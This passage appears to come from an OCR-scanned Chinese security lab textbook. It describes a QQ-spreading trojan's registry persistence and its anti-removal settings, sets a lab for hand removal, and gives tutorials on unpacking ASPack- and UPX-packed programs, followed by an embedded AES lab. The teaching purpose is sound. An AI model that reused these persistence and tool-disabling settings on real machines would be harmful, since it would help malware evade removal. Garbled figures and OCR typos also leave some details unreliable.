(2) 从 黑客 网 站 下 载 Backdoor/Jieba.2004 并 保存 为 : %SystemDir%\comime.exe， 
49 576B; %SystemDir%\msinthk.dll，6656B 。 

(3) 在 注册 表 中 添加 下 列 启动 项 : 

[HKEY LOCAL MACHINE\SOFTWARE\Microsof\Windows\CurrentVersion\Run] ; 
"mssysint" = comime.exe; "Windows Management Instrumentation" = wmimgrexe。 这 样 ， 


在 Windows 启动 时 ， 病 毒 就 可 以 自动 执行 。 
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(4) 病毒 通过 修改 以 下 注册 表 键 值 ， 达 到 用 户 无 法 手工 修改 注册 表 和 使 用 任务 管理 
器 的 目的 : 

[HKEY_ CURRENT USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ 
System] "DisableTask Mgr" = 1; "DisableRegistryTools" = 0x01。 

(5) 创建 两 个 定时 器 ， 每 隔 一 定时 间 查 找 QQ 聊天 消息 窗口 并 向 所 有 在 线 用 户 发 送 
病毒 文件 ， 带 毒 文 件 扩展 名 为 .jpg.exe。 


【实验 环境 】 
可 还 原 的 操作 系统 ，wmimgrexe，RegSnap.exe。 


【实验 步骤 】 

1. 体会 程序 wmimgrexe 对 系统 的 影响 

(1) 首先 使 用 RegSnap 创建 一 快照 并 存档 ， 参 数 为 默认 《〈 该 步骤 中 参数 均 为 默认 )。 

(2) 在 本 机 上 运行 wmimgr.exe 病毒 程序 。 

(3) 再 次 使 用 RegSnap 创建 快照 并 存档 ， 并 使 用 快照 比较 功能 分 析 比 较 报告 。 

(4) 尝试 手工 解除 该 程序 对 系统 的 影响 。 

2. 实际 手动 解除 wmimgr.exe 

(1) 首先 重复 了 第 三 阶段 的 工作 。 可 以 用 第 三 阶段 的 存档 文件 来 做 分 析 ， 也 可 以 重 
新 启动 计算 机 ， 使 得 C 盘 还 原 ， 重 新 观察 wmimgrexe 的 运行 结果 。 重 新 点 击 观看 
wmimgr.exe 对 系统 的 影响 。 

(2) 使 用 RegSnap 来 分 析 wmimgr.exe 对 注册 表 和 文件 系统 的 修改 。 

根据 使 用 RegSnap 得 到 的 比较 报告 ， 该 病毒 程序 修改 注册 表 的 某 些 键 值 ， 如 
HKEY CURRENT USER \SOFTWARE \Microsoft \Windows \CurrentVersion \Policies 
\System 下 修改 "DisableRegistryTools" = 0x01 和 " DisableTaskMgr " = 1， 使 用 户 无 法 手工 
修改 注册 表 和 使 用 任务 管理 器 ， 从 而 使 得 手动 解除 病毒 变 得 困难 了 。 不 过 可 以 通过 下 载 
“超级 兔子 ”或 者 “优化 大 师 ” 来 解除 对 注册 表 的 禁用 。 

解除 注册 表 和 任务 管理 器 的 禁用 后 ， 会 发 现在 任务 管理 器 中 新 增 了 wmimgrexe 和 
comime.exe 两 个 进程 ， 同 时 也 在 C:\Windows\system32 目录 下 新 建 了 comime.exe 和 
wmimgr.exe 两 个 文件 。 

(3) 重新 登录 QQ， 看 是 否 已 经 完全 解除 病毒 。 如 果 仍 未 解除 ， 继 续 进行 分 析 。 

注 : 也 可 以 使 用 File2000、FileMon 和 RegMon 来 进行 分 析 。 


【思考 题 】 

编写 非 感 染 性 流行 病毒 的 专 杀 软件 。 
(1) 分 小 组 进行 设计 ， 每 小 组 4 一 6 人 。 
(2) 通常 包括 如 下 几 个 模块 。 

@ 枚 举 与 结束 进程 。 

@ 修改 注册 。 

@ 删除 病毒 文件 。 
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(3) 要 求 该 专 杀 软件 可 以 扩充 。 
@ 即将 特定 病毒 的 查 杀 信息 放 在 某 个 固定 文件 中 ， 或 者 数据 库 中 。 
@ 通过 增加 特定 病毒 的 查 杀 信息 文件 ， 或 者 添加 数据 库 条 目 就 可 以 查 杀 特定 病毒 。 


和 4 ”软件 加 壳 与 解 壳 


12.4.1 自动 加 壳 与 解 壳 


【实验 目的 】 
熟悉 加 这 与 解 达 工具 ， 学 会 给 软件 加 解 克 。 


【原理 简介 】 

1. 所 谓 “ 壳 ”就 是 专门 压缩 的 工具 

这 里 的 压缩 并 不 是 平时 使 用 的 RAR、ZIP 这 些 压 缩 工具 ， 壳 的 压缩 指 的 是 针对 exe、 
com 和 dll 等 程序 文件 进行 压缩 , 在 程序 中 加 入 一 段 如 同 保护 层 的 代码 , 使 原 程序 文件 代 
码 失去 本 来 面目 ， 从 而 保护 程序 不 被 非法 修改 和 反 编译 ， 这 段 如 同 保护 层 的 代码 ， 与 自 
然 界 动 植物 的 壳 在 功能 上 有 很 多 相似 的 地 方 ， 所 以 就 形象 地 称 之 为 程序 的 壳 。 

壳 的 作用 如 下 。 

(1) 保护 程序 不 被 非法 修改 和 反 编 译 。 

(2) 对 程序 专门 进行 压缩 ， 以 减 小 文件 大 小 ， 方 便 传播 和 储存 。 

和 过 和 压缩 软件 的 压缩 有 以 下 区 别 。 

(1) 压缩 软件 只 能 够 压缩 程序 。 

(2) 经 过 过 压缩 后 的 exe、com 和 dll 等 程序 文件 可 以 跟 正常 的 程序 一 样 运行 。 

2. 加 壳 与 脱 壳 

所 谓 加 壳 ， 是 一 种 通过 一 系列 数学 运算 ， 将 可 执行 程序 文件 或 动态 链接 库 文件 的 编 
码 进 行 改变 (目前 还 有 一 些 加 过 软件 可 以 压缩 、 加 密 驱 动 程序 )， 以 达到 缩小 文件 体积 或 
加 密 程 序 编码 的 目的 。 

当 被 加 壳 的 程序 运行 时 ， 外 壳 程 序 先 被 执行 ， 然 后 由 这 个 外 壳 程 序 负责 将 用 户 原 有 
的 程序 在 内 存 中 解压 缩 ， 并 把 控制 权 交 还 给 脱 壳 后 的 真正 程序 。 一 切 操作 自动 完成 ， 用 
户 不 知道 也 无 须知 道 这 程序 是 如 何 运 行 的 。 一 般 情况 下 ， 加 这 程序 和 未 加 这 程序 的 运行 
结果 是 一 样 的 。 

脱 壳 成 功 的 标志 : 脱 壳 后 的 文件 正常 运行 ， 功 能 没有 损耗 。 还 有 一 般 脱 壳 后 的 文件 
长 度 都 会 大 于 原文 件 的 长 度 。 即 使 同一 个 文件 ， 采 用 不 同 的 脱 壳 软 件 进行 脱 壳 ， 由 于 脱 
壳 软 件 的 机 理 不 通 ， 脱 出 来 的 文件 大 小 也 不 尽 相 同 。 

现在 ， 脱 壳 一 般 分 手动 和 自动 两 种 ， 手 动 脱 壳 是 指 不 借助 于 自动 脱 达 工具 ， 而 是 用 
动态 调试 工具 如 TRW2000、TR、SOFTICE 等 来 脱 壳 。 手 动 脱 壳 一般 难度 较 大 ， 需 要 使 
用 调试 器 、 内 存 抓 取 工 具 、 十 六 进 制 工具 、PE 编辑 工具 等 ， 对 脱 壳 者 有 一 定 水 平 要 求 。 
而 自动 就 稍 好 些 ， 用 专门 的 脱 壳 工 具 来 脱 ， 最 常用 的 某 种 压缩 软件 都 有 他 人 写 的 反 压 缩 
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工具 对 应 , 有 些 压缩 工具 自身 能 解压 ; 有 些 不 提供 这 功能 , 如 ASPack, 就 需要 UnASPack 
对 付 。 很 多 文件 使 用 了 一 些 压 缩 加 过 软件 加 密 过 , 这 就 需要 对 文件 进行 解压 脱 壳 处 理 后 ， 
才能 汉化 。 这 种 压缩 与 人 们 平时 接触 的 压缩 工具 如 WinZip, WinRRA 等 压缩 不 同 , WinZip 
和 WinRAR 等 压缩 后 的 文件 不 能 直接 执行 ， 而 这 种 EXE 压缩 软件 ，EXE 文件 压缩 后 ， 
仍 可 以 运行 。 这 种 压缩 工具 把 文件 压缩 后 ， 会 在 文件 开头 一 部 分 ， 加 了 一 段 解压 代码 。 
执行 该 文件 时 ， 该 代码 先 执 行 解压 还 原文 件 ， 不 过 这 些 都 是 在 内 存 中 完成 的 ， 由 于 微型 
计算 机 速度 快 ， 人 们 基本 感觉 不 出 有 什么 不 同 。 


【实验 环境 】 

ASPack 包 及 对 应 的 UnASPack 包 , 检测 工具 FileInfo, 调试 工具 Windbg, UPX 加 过 
软件 ， 功 能 强大 的 脱 壳 软件 RrocDump。 

【实验 步骤 】 

1. 用 FileInfo 测试 PE 文件 是 被 哪 种 壳 给 加 密 了 

首先 ， 要 把 下 载 的 FileInfo 先 解 压缩 安装 到 某 个 目录 假设 为 C:\Documents and 
Settings\Administrator\ 桌 面 \try )。 

接着 , 把 下 载 的 aspack.exe 拷贝 到 以 上 目录 (C:\Documents and Settings\Administratorn\ 
桌面 \try)。 

然后 ， 打 开 一 个 DOS 视窗 ， 并 且 切 换 到 C:\Documents and Settings\Administrator\ 桌 
面 vtry 目录 下 ， 然 后 输入 “fi aspack.exe”。 

用 FileInfo 得 到 的 结果 如 图 12-10 所 示 。 


Ei 


HEX Interesting values 
Signature “BE »” 58459999h 25519 8880063AFh 


Alignnent file = phys 8266h Entry point : 3237h 
sections = virt 1666h RUA : 99983237h 


hi» 
Base of inage v8.80 ‘4909900h 11999h 
code 498Bh 


data Gh 7000h 
Type Subsysten v4.88 Vindow: Qh 
Required CPUZ0S v4-98 Ch F G800610Eh 


Size of header is 1999h /818Bh NTHd BeEBh 
Loader flag s 8666h /8866h TimeStamp : 355A57D6h 


File checksun is 182F7h Linker version : 3-19 


Size init/comnit heap G8188806h /BBBB1BBBh 98 98 75 98 E9 C8 9D 88 99 99 
Stal 9891860680h /6866816866h Be 88 99 99 99 99 90 99 99 99 | 


图 12-10 查看 aspack.exe 的 加 壳 软 件 


用 FileInfo 可 以 侦 测 出 aspack.exe 使 用 ASPack v1.07b 进行 加 壳 ; 用 同样 的 方法 侦 测 
出 notepad.exe 使 用 加 这 工具 UPX 进行 加 过， 该 加 这 工具 版 本 号 为 1.01。( 注 : 图 12-10 
中 该 显示 加 这 软件 的 位 置 显 示 PE Win GUI 之 类 , 说 明 FileInfo 检测 结果 为 未 加 这 或 者 检 
测 不 出 来 ， 可 尝试 用 其 他 检测 软件 。) 

2. 对 侦 测 出 的 加 壳 软 件 进行 脱 壳 

(1) 用 ProcDump 1.6.2 来 剥 ASPack 1.07b 的 壳 ， 首 先 ， 把 ProcDump 解压 缩 安 装 到 
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刚刚 的 目录 (C:\Documents and Settings\Administraton 桌 面 \try )。 
(2) 执行 ProcDump， 会 看 到 如 图 12-11 所 示 的 视窗 。 


ProcDump32 (C) 1998, 1999, 2000 G6-Ro¥, Lorian & Stone 


Choose Unpacker 


图 12-11 引出 函数 节 的 基本 组 织 结构 


选择 与 加 过 工具 版 本 相对 应 的 选项 (该 例 中 加 壳 工具 为 ASPack1.07b， 则 理所当然 
应 选择 Aspack<108)。 

(3) 此 时 ，ProcDump 会 要 求 开 启 要 和 剥 壳 的 执行 档 ， 把 路 径 指 到 C:\Documents and 
Settings\Administrator\ 桌 面 \try\ASPACK .exe。 

(4) 过 不 久 ，PrucDump 就 会 要 求 输入 要 输出 的 文档 名 (也 就 是 aspack.exe 这 被 剥 
掉 以 后 另存 为 的 文件 名 )， 这 里 举例 为 unpackas.exe， 此 时 ， 也 代表 剥 过 成 功 。 

(5) 比较 加 过 前 后 软件 的 大 小 ， 将 发 现 : 没有 和 剥 壳 的 aspack.exe 只 有 36.SKB， 但 是 
剥 过 后 ， 文 件 大 小 达到 55.5KB。12.4.2 节 中 将 会 比较 分 析 软 件 加 壳 前 后 的 不 同 之 处 。 

(6) 采用 上 述 同样 的 步骤 对 notepad.exe 进行 解 壳 。 


【思考 题 】 
使 用 UE 修改 ProcDump 目录 下 的 Scriptini 文件 ， 使 ProcDump 可 以 脱 UPX 0.82 
的 壳 。 


12.4.2 ”比较 PE 文件 加 解 壳 前 后 变化 


【实验 目的 】 

熟悉 PE 文件 格式 ， 比 较 PE 文件 加 解 壳 前 后 的 变化 。 
【实验 环境 】 

Windows 操作 系统 ，PE 文件 查看 工具 Stud_PE。 
【实验 步骤 】 


比较 PE 文件 加 壳 前 后 的 变化 ,用 PE 查看 工具 Stud_PE 分 别 打开 aspack.exe 和 与 之 
对 应 的 脱 壳 后 的 程序 unaspack.exe， 如 图 12-12 和 图 12-13 所 示 。 

分 析 比 较 用 ASPack 加 壳 前 后 的 文件 。 

对 notepad.exe 进行 脱 壳 并 比较 脱 壳 后 与 脱 壳 前 字段 属性 的 变化 。 
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Stnd PE operating on SSDSCEUEEEC 
Eile Edit Tools kelp 


ci\docments and settings\adninistrator\ 夏 面 \23.4. 1 工具 Vaspack exe 
[Re y Dos | OSections| FFunctions| ms Resources| 有 


HEADERS (Coff+Optional) 过 
[| Raw 
T00003237 entrypoint (raw) re Ee — | 
[0 mosese [EEC 
Ja see et maoe Dr | 
[oo001000 secticns Alignment 去 二 
oo000200 Fs alignmant 
ee 
foooooior Characteristics 回 
(Misit Stud PE or 1- 


图 12-12 用 Stud_PE 打开 aspack.exe 


Stud PE opprating on 
Eile Edit Tools Help 


ENdocuments and settines\adninistrator\ 大 面 23.4. 1I 上 Vunaspack exe 
Whos| OSections| Functions| rsResources| © Signature| |» 
_HEADERS (Coff+ Optional) 


Ea a 
[000085E entrypoint (raw) 一 


eport_Tebi]f 00000000 「o0000000 「00000000 
Ds | 
Cn | | [EEC Coca 
TO Womeer den | 
[000 charscersics 口 Bc WEADERS tree view in hexedi]EAVE to filq 


图 12-13 用 Stud_PE 打开 unaspack.exe 


12.4.3 手动 解 壳 


【实验 目的 】 

尝试 手动 为 加 壳 的 软件 进行 解 过， 深入 理解 解 过 的 过 程 。 

【原理 简介 】 

手动 解 克 的 步骤 如 下 。 

(1) 首先 ， 需 要 确定 壳 的 种 类 。 拿 到 软件 后 ， 首 先 用 侦 测 文件 类 型 的 工具 来 看 所 加 
的 是 哪 种 壳 。 

(2) 入 口 点 〈Entry Point) 的 确定 。 绝 大 多 数 PE 加 过 程序 在 被 加 密 的 程序 中 加 上 一 
个 或 多 个 段 ， 所 以 看 到 一 个 路段 的 JMP 就 有 可 能 是 了 。 这 种 判断 一 般 是 跟踪 分 析 程 序 而 
找到 入 口 点 。 

(3) dump 取 内 存 已 还 原文 件 。 找 到 入 口 点 后 ， 在 此 处 可 以 用 ProcDump 的 FULL 
DUMP 功能 来 抓 取 内 存 中 的 整个 文件 。 
用 MAKEPE 从 内 存 中 整理 出 一 个 指令 名 称 的 PE 格式 的 EXE 文件 ， 当 前 的 EIP 将 
成 为 新 的 程序 入 口 ， 生 成 文件 的 Import table 已 经 重新 生成 过 了 。 生 成 的 PE 文件 可 运行 


272 


en 第 12 章 恶意 代码 处 理 mm 


在 任何 平台 上 。 
(4) 修正 刚 dump 取 的 文件 。 如 果 用 ProcDump 的 FULL DUMP 功能 抓 取 脱 壳 文件， 
要 用 ProcDump 或 PE Editor 等 PE 编辑 工具 修正 入 口 点 。 


【实验 环境 】 
Windows XP 系统 ，FileInfo.exe，Ollydbg.exe，ProcDump.exe，notepad.exe。 


【实验 步骤 】 

对 notepad.exe 进行 手动 解 这 。 

1. 确定 壳 的 种 类 

拿 到 软件 后 ， 可 用 工具 FileInfge、GTW、TYP32 等 侦 测 文件 类 型 的 工具 来 看 看 是 何 
种 软件 压缩 的 ， 在 此 以 FileInfo 为 例 ， 把 目标 文件 notepad.exe 复制 到 FileInfo 目录 下 ， 
在 DOS 窗口 下 切换 到 该 目录 ， 用 命令 fnotepad.exe 即 可 查看 。 

2. 入 口 点 (Entry Point) 确定 

(1) 利用 TRW2000 特有 命令 PNEWSEC: TRW2000 也 是 一 款 优秀 的 脱 壳 工具 ， 有 
许多 特有 的 命令 对 脱 壳 很 有 帮助 ， 不 过 只 能 在 Windows 9x/2000 下 运行 ， 在 Windows 98 
下 用 PNEWSEC 命令 也 可 方便 地 找到 入 口 点 。 

运行 TRW2000 并 装载 目标 程序 ， 然 后 LOAD， 程 序 将 中 断 在 主 程序 入 口 处 ， 通 过 
命令 PNEWSEC 等 上 一 段 时 间 ， 程 序 将 中 断 在 入 口 点 处 。 

(2) 因 现 有 系统 一 般 都 是 Windows XP 系统 ， 在 此 介绍 用 Ollydbg 来 调试 脱 过。 用 
Ollydbg 进行 脱 壳 要 比 SoftICE 和 TRW2000 方便 得 多 。 运 行 Ollydbg， 单 击 菜单 【选项 】 
1【 调 试 设置 ])， 将 第 一 次 暂停 设 在 WinMain 函数 上 。 再 用 Ollydbg 打开 实例 notepad.exe 
就 可 中 断 在 外 壳 的 入 口 点 处 了 ， 如 图 12-14 所 示 。 


插件 到) 选项 G) 窗口 如 帮助 00 


szJzJMJTJwJalclzJxJsJRTs 用 可 到 对 


图 12-14 调试 中 断 在 外 壳 的 入 口 点 处 


图 12-14 中 相关 代码 如 下 : 0040E8C0 60 pushad。 一 开始 Ollydbg 就 会 中 断 这 行 ， 这 
个 就 是 外 过 的 入 口 点 ， 注 意 这 个 pushad 指令 。 

绝 大 多 数 加 这 程序 在 被 加 密 的 程序 中 加 上 一 个 或 多 个 段 ， 所 以 依据 跨 段 的 转移 指令 
(JMP) 就 可 找到 真正 的 入 口 点 ， 此 时 就 会 有 POPAD/POPFD 指令 出 现 。UPX 用 了 一 次 
跨 段 的 转移 指令 (JMP)， 在 跳 到 OEP 处 会 看 到 虚拟 地 址 的 值 有 一 个 突变 ， 此 时 就 能 确 
定 OEP 了。 
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UPX 壳 比 较 简 单 ， 大 家 不 必要 跟踪 去 找 这 个 跨 段 的 转移 指令 ， 中 断 WinMain 后 ， 只 
需要 在 Ollydbg 里 往 下 翻 屏 ， 就 会 发 现 这 个 跨 段 转移 指令 ， 如 图 12-15 所 示 。 


AN | 


ODO rt 


TR D3: TES 


notepad. 848009 
PRPS: [EBX, ERx 


刁 | 沪 
图 12-15 确定 入 口 点 


选中 部 分 0040DDBF JMP notepad.00401000 就 是 跳 到 OEP 的 指令 ， 执 行 到 这 里 ， 
UPX 外 过 已 将 程序 解压 完毕 , 并 模拟 Windows 加 载 器 将 原始 程序 加 载 到 内 存 ，00401000 
就 是 映射 到 内 存 目 标 程序 的 入 口 点 ， 此 时 就 可 抓 取 内 存 映 像 文件 了 。 

3. dump 取 内 存 中 已 脱 壳 的 文件 

运行 ProcDump， 在 Task 的 列表 中 的 第 一 个 list 上 单 击 鼠 标 右键 ， 然 后 选择 Refresh 
list。 在 Task 列表 中 找到 notepad.exe, 在 它 的 上 面 单 击 鼠 标 右键 。 然后, 选中 Dump (Full)， 
给 脱 壳 的 程序 起 名 存盘 。 再 在 notepad.exe 上 单 击 鼠 标 右键 ， 然 后 选中 Kill Task。 

4. 修正 刚 dump 取 的 文件 的 入 口 点 

再 次 使 用 ProcDump 的 PE Editor 功能 ， 打 开 已 脱 壳 的 notepad.exe。 在 Header Infos 
一 项 ， 会 看 见 程序 的 Entry Point (入 口 值 ) 是 0000DC70， 这 当然 是 错误 的 。 如 果 试 着 不 
改动 这 个 入 口 值 而 运行 脱 壳 后 的 notepad.exe， 程 序 将 无 法 运行 。 在 ProcDump 可 看 到 
ImageBase 二 00400000， 上 面 跟踪 找到 的 入 口 值 的 RVA = 00401000， 因 此 Entry Point== 
RVA-ImageBase, 改变 入 口 值 =00001000, 单 击 OK 按钮 。 现 在 , 运行 脱 壳 后 的 notepad.exe， 
它 应 该 正常 运行 了 。 

【思考 题 】 

尝试 使 用 优化 PE 文件 的 工具 (如 MakePE) 对 脱 壳 后 的 文件 进行 优化 ， 以 达到 缩小 
脱 壳 后 的 文件 大 小 等 目的 。 
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ee 
嵌入 式 系统 安全 实验 


柑 入 式 系 统 在 国防 、 公 安 、 工 业 、 民 用 等 领域 有 广泛 的 应 用 ， 除 了 个 人 终端 ”工业 
控制 、 物 联网 等 应 用 之 外 ， 和 嵌入 式 设 备 由 于 其 自身 的 特点 ， 很 适合 作为 信息 安全 的 节点 
设备 使 用 ， 如 密码 机 、VPN、 安 全 网 关 设 备 、 信 息 过 滤 设 备 、 个 人 身份 终端 〈 如 Ukey) 
等 。 嵌 入 式 设备 已 成 为 人 们 生活 和 工作 中 不 可 缺少 的 信息 设备 。 

长 期 以 来 , 很 多 人 认为 嵌入 式 系统 的 软件 是 固化 的 , 不 存在 被 算 改 和 攻击 的 可 能 性 ， 
因此 对 于 嵌入 式 系统 的 安全 问题 ， 业 界 并 没有 给 予 应 有 的 重视 和 研究 。 然 而 ， 随 着 嵌入 
式 系统 的 存储 器 越 来 越 多 地 采用 可 编程 Flash， 病 毒 等 恶意 代码 完全 可 以 攻击 嵌入 式 系 
统 ， 并 已 出 现 多 起 恶性 事件 。 而 且 妃 入 式 系统 所 担任 的 角色 也 越 来 越 重要 ， 因 而 近来 业 
界 对 于 嵌入 式 系统 的 可 信 性 和 安全 性 提出 了 更 高 的 要 求 。 

本 章 所 描述 的 几 个 实验 ， 从 嵌入 式 系统 实现 密码 算法 的 基本 功能 开始 ， 设 计 了 AES 
算法 实现 、SD 卡 加 密 存 储 、 软 件 信任 验证 等 基础 实验 , 基本 获 盖 了 从 信息 安全 应 用 到 购 
入 式 系统 自身 安全 等 概念 和 方法 。 

本 章 实验 使 用 的 嵌入 式 平 台 是 博 创 ARM9 (S3c2410) 系列 平台 ,操作 系统 为 髓 入 式 
Linux (2.4 或 2.6 内 核 )， 本 章 所 涉及 的 程序 都 通过 了 博 创 ARM9 实验 平台 验证 。 因 本 实 
验 内 容 仅 依靠 ARM9 芯片 本 身 ， 并 没有 额外 要 求 特 殊 的 硬件 设备 ， 因 此 其 他 的 各 类 
S3c2410 平台， 也 可 完成 本 章 所 描述 的 实验 内 容 。 


入 1 说 入 式 系 统 的 密码 算法 实现 


【实验 目的 】 

通过 本 次 实验 ， 掌 握 在 嵌入 式 平台 上 进行 交叉 编译 的 方法 以 及 实现 AES 算法 的 
方法 。 

【原理 简介 】 

交叉 编译 是 指 : 在 某 个 主机 平台 上 (比如 PC) 用 交叉 编译 器 编译 出 可 在 其 他 平台 上 
(比如 ARM 上 ) 运行 的 代码 的 过 程 。 因 为 一 般 的 编译 工具 链 需 要 很 大 的 存储 空间 ， 并 需 
要 很 强 的 CPU 运算 能 力 ， 但 是 ARM 的 资源 有 限 。 为 了 解决 这 个 问题 ， 交 叉 编 译 工 具 就 
应 运 而 生 了 。 通 过 交叉 编译 工具 ， 我 们 就 可 以 在 CPU 能 力 很 强 、 存 储 空间 足够 的 主机 平 
台 上 《比如 PC) 编译 出 针对 其 他 平台 的 可 执行 程序 ， 如 图 13-1 所 示 。 


[| PC UP-CUP S2410 


< 一 伐 入 式 实验 平台 
Bedhot ARM-Linux 
(kernel 2.4.18.6) 
ARM-Linux 串口 线 /网 线 一 
交叉 编译 环境 | | 一 目标 程序 


图 13-1 交叉 编译 环境 
本 实验 所 使 用 的 开发 系统 是 x86 体系 结构 的 Linux 系统 (RedHat)， 而 目的 是 要 开发 


能 够 运行 在 UP-NETARM2410-S 嵌入 式 实验 平台 上 的 Linux 应 用 程序 。 由 于 
UP-NETARM2410-S 己 入 式 实验 平台 中 的 Linux 本 身 不 具有 自己 的 编译 工具 ， 因 此 必须 
在 RedHat 中 进行 交叉 编译 ， 编 译 完成 后 将 执行 代码 下 载 到 UP-NETARM2410-S 嵌入 式 
实验 平台 中 的 Linux， 然 后 运行 或 调试 。 这 样 做 的 另 一 个 好 处 是 ， 通 常 采 用 RedHat 的 主 
机 系统 ， 其 CPU 速度 、 接 口 等 软 硬 件 资源 都 比 UP-NETARM2410-S 嵌入 式 实验 平台 中 
的 Linux 要 丰富 得 多 ， 因 此 在 其 上 运行 交叉 编译 效率 更 高 。 


在 同一 平台 下 编译 、 能 够 运行 在 不 同 平台 上 的 程序 之 间 最 主要 的 差别 在 于 所 采用 的 


编译 器 不 同 。 在 RedHat 中 编译 x86 平台 的 程序 采用 的 是 gce 编译 器 ， 而 编译 ARM 平台 
的 则 采用 arm-elf-gcc 或 者 arm-linux-gcc 编译 器 。 在 本 实验 中 ， 所 有 Linux 实验 均 采用 
/opt/host/arm41/bin/armv4l-unknown-linux-gcc 编译 器 。 


【实验 环境 】 

宿主 机 (PC) 环境 : 

硬件 :PC 机 Pentium 500MHz 以 上 ,硬盘 40GB 以 上 ， 内 存 大 于 512MB。 

软件 ， Ubuntu 11.10 ，ARM-Linux 交叉 编译 开发 环境 ，JTAG 烧 写 Flash 工具 等 。 
诅 入 式 平台 环境 ( 博 创 S3C2410): 

硬件 : ARM9 芯片 ，64MB SDRAM。 

软件 ， 内 核 版 本 linux 2.4.18.6，RAMDISK 文件 系统 ，YAFFS 文件 系统 等 。 


【实验 步骤 】 
(1) 从 NIST 官方 网 站 下 载 一 个 名 为 “rijndael-alg-fst.c” 的 AES 算法 标准 实现 程序 。 


建立 工作 目录 ， 将 rijndael-alg-fst.c 复制 到 工作 目录 中 并 重 命 名 为 aes.c。 
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[root@zxt smile]# mkdir aes 
[root@zxt smile]# cd aes 
[root@zxt hello]# mv rijndael-alg-fst.c aes.c 


(2) 按照 原理 简介 部 分 的 优化 思路 编写 本 实验 配套 的 改进 AES 算法 程序 。 
(3) 用 随机 的 方法 产生 四 组 128 位 的 明文 和 128 位 的 密 钥 ， 分 别 用 本 实验 配套 程序 


me 第 13 章 底 入 式 系统 安全 实验 mm 


和 NIST 的 标准 程序 对 其 进行 加 密 ， 比 较 加 密 的 结果 是 否 相 同 ， 若 相同 则 表明 本 实验 配 
套 程序 加 密 功 能 是 正确 的 。 然 后 对 密 文 解 密 ， 若 解密 之 后 能 够 恢复 出 正确 的 明文 ， 则 说 
明 该 配套 程序 解密 功能 是 正确 的 。 

(4) 在 main() 函 数 中 添加 以 下 计时 代码 , 测定 多 次 加 /解密 的 耗 时 , 测定 方法 如 图 13-2 
所 示 代 码 。 


elapsed = -clock (); 

for( i= iterations; i >0 ; i-- ) 
AES_Func(PlainText RoundKey); 

elapsed += clock (); 

sec = (double) elapsed / CLOCKS PER SEC:; 

Speed = 128*iterations/1E6/sec; 


图 13-2 测定 时 间 的 方法 


clock() 函 数 是 一 个 计时 函数 ， 它 返回 从 开始 这 个 程序 进程 到 调用 clock 函数 所 用 的 
CPU 时 钟 计时 单元 数 。CLOCKS_PER_SEC 这 一 常量 在 头 文件 time.h 中 。 速 度 speed 的 
计算 方法 为 :分 组 长 度 X 达 代 次 数 二 时 间 二 106。 

(5) 要 使 上 面 的 aes.c 程序 能 够 运行 ， 需 编写 一 个 Makefile 文件 ，Makefile 文件 定 
义 了 一 系列 的 规则 ， 它 指明 了 哪些 文件 需要 编译 ， 哪 些 文件 需要 先 编译 ， 哪 些 文件 需要 
重新 编译 等 复杂 的 命令 。 下 面 介 绍 本 次 实验 用 到 的 Makefile 文件 。 与 上 面 编写 aes.c 的 
过 程 类 似 ， 用 vi 来 创建 一 个 文件 名 为 Makefile 文件 并 将 以 下 代码 录入 其 中 。 

[root@zxt aes]# vi Makefile 

CC = armv4l-unknown-linux-gcc 


EXEC = aes 
OBJS = aes.o 
CFLAGS += 


LDFLAGS += -static 

all: $ (EXEC) 

$ (EXEC) : $ (OBJS) 

$ (CC) $ (LDFLAGS) -o $@ $(0BJS) 
clean: 

rm -上 $(EXEC) *.elf * gdb *.o 


注意 :“$(CC) SLDFLAGS) -o $S@ $S(OBJS)” 和 “-rm -f $(EXEC) *.elf *.gdb *.o” 前 
空白 由 一 个 Tab 制 表 符 生成 ， 不 能 单纯 由 空格 来 代替 。 

(6) 在 编写 完成 Makefile 后 ， 就 可 以 在 当前 目录 下 运行 “make” 来 编译 程序 ， 结 果 
会 生成 可 执行 程序 aes。 如 果 进 行 了 修改 ， 重 新 编译 则 运行 。 

[root@zxt hello]# make clean 

[root@zxt hello]# make 


注意 : 编译 、 修 改 程序 都 是 在 宿主 机 (本 地 PC) 上 进行 的 ， 不 能 在 MINICOM 下 
进行 。 
(7) 在 宿主 PC 上 启动 NFS 服务 , 并 设置 好 共享 的 目录 , 之 后 就 可 以 进入 MINICOM 
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中 建立 开发 板 与 宿主 PC 之 间 的 通信 了 。 首先 将 网 络 文件 系统 挂 载 到 本 地 host 文件 夹 上 。 
然后 切换 工作 目录 到 /host 并 运行 可 执行 程序 aes。 


[root@zxt hello]# minicom 

[/mnt/yaffs] mount -t nfs -o nolock 192.168.0.56:/arm2410s /host 
[/mnt/yaffs] cd /host 

[/mnt/yaffs] ./aes 


注意 : 开发 板 挂 接 宿主 计算 机 目录 只 需要 挂 接 一 次 便 可 ， 只 要 开发 板 没 有 重启 ， 就 
可 以 一 直 保持 连接 。 这 样 可 以 反复 修改 、 编 译 、 调 试 ， 不 需要 下 载 到 开发 板 。 

(8) 程序 的 结果 直接 输出 到 屏幕 ， 以 便 随 时 记录 在 实验 报告 上 ， 也 可 将 其 保存 在 文 
件 中 。 程序 运行 完成 后 ， 对 结果 进行 分 析 ， 并 将 结论 写 在 实验 报告 中 。 


【实验 报告 】 
详细 叙述 实验 过 程 ， 记 录 测 试 结果 。 
1. 程序 正确 性 的 测试 〈 表 13-1) 


表 13-1 程序 正确 性 的 测试 


数据 以 十 六 进 制 形式 给 出 记过 的 AES 算法 程序 NIST 的 AES 标准 程序 _ 
加 密 之 后 加 密 之 后 解密 之 后 

随机 明文 : 
3243f6a8885a308d 

例 B13198a2e0370734 3925841d2dc9fbd |3243f5a8885a308d |3925841d2dc9fbd |3243f{6a8885a308d 
随机 密 钥 : c118597196a0b32 |313198a2e0370734 |c118597196a0b32 |313198a2e0370734 
2b7e151628aed2a6 
abf7158809cf4f3c 

第 二 次 

第 NN 次 


结论 : 
2. 程序 加 、 解 密 速度 的 测试 〈 表 13-2) 

表 13-2 程序 加 、 解 密 速度 的 测试 
改进 的 AES 程序 /Mbps 


NIST 的 AES 标准 程序 /Mbps 
加 密 解密 
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【思考 题 】 


如 何 利用 嵌入 式 平台 实现 SMS4、HASH、ECC 等 经 典 的 密码 算法 ? 


而 2 ”和 骨 入 式 系统 的 存储 安全 


【实验 目的 】 


通过 本 次 实验 ， 掌 握 通过 向 Linux 内 核 源码 合适 位 置 添加 加 密 函 数 来 实现 对 SD 卡 


的 全 盘 加 密 的 方法 ， 并 加 深 了 解 AES 加 密 算法 的 应 用 。 
【原理 简介 】 


